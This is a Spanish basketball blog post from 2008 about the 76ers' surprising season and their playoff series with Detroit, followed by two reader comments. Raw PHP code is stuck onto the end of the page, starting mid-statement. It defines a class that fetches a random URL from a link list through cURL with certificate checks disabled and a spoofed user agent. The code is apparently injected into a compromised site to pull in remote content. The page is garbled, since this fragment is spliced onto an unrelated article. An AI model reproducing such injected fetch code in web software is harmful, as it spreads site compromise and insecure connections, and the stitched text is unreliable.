Estos Sixers “are for real”

03 de May de 2008 por TheDeerHunter

Todo el mundo esperaba una temporada de transición en la Philadelphia post-Iverson. Había mimbres, sí. Jovenes jugadores con proyección y, Maurice Cheeks, un entrenador muy bien considerado… además de un cierto margen salarial previsto para dar un salto de calidad para la próxima temporada y quizá alguna buena elección en el draft de este verano. Había que ser muy optimista para pensar que los Sixers podían meterse este mismo año entre los ocho primeros de la conferencia este.

Sin embargo, los Sixers desde el primer momento han mostrado un nivel mucho más alto de lo esperado de la mano de dos grandes arquitectos. Cheeks desde el banquillo y André Miller desde la cancha. Han mostrado ambición y calidad, dureza e ilusión y se han ganado el respeto de todos, yendo de menos a más hasta el punto que ser considerados como el equipo más en forma de la liga en determinadas fases de la competición.

En ésto, Detroit se cruza en su prometedor camino. Nadie puede expresar en voz alta que los Pistons, en modo “crucero de playoffs”, pueda tropezar contra un equipo plagado de recien llegados a la liga y de jugadores de segunda fila. PERO, muchas veces con Detroit siempre existe una sombra de sospecha. Una rotación muy escasa de jugadores de cierta edad sin una superestrella como referente, muchos partidos a sus espaldas… y bueno, Philly ya les había tocado la cara en la mitad de los partidos en los que se habían enfrentado este año y su juventud y potencia física bien podía resultar incómoda para los “viejos gladiadores” de Detroit.

Los Sixers han jugado bien sus cartas. No se puede poner ninguna pega a lo que se ha hecho esta temporada. Han jugado rápido, han explotado su intensidad, su juventud, por momentos han sorprendido a Detroit y les han dado fuerte y duro. Pero es que si hay que hablar de tablas seguramente nos vendría a la cabeza Detroit y San Antonio. Ambos ex-campeones y palabras mayores.

Detroit a siete partidos es un rival temible y lo ha demostrado. Tiene muchas virtudes y encuentra con facilidad tus defectos. Se mueve como pez en el agua en Playoffs, que es su hábitat natural. Te asfixia en defensa y te mata en ataque. No puedes despegarte de ellos pero si ellos se despegan no hay nada que hacer. Te aburre, te desespera… Les falta un pequeño escalón para tenerlo todo sí, y cada año que pasa será más difícil… pero ni a San Antonio les resultó fácil batirles.

A los Sixers todavía les hace falta comer muchas lentejas para llegar a ese nivel pero eso debe ser ninguna deshonra para ellos. El futuro puede ser suyo.

Comenta

2 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Esto es lo que se espera de una serie de play-offs, por muy favorito que sea tu rival, y no la vergüenza que nos hemos tenido que tragar con Denver.

      Citar

  2. Gallis dice:
    #2

    Correcto!!!

    Como ya dije, por mucho miedo que dieran los Nuggets, Philadelphia o Atlanta han ganado en una semana casi los mismos partidos de PO´s que Denver en 5 años, jurl, jurl, jurl…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>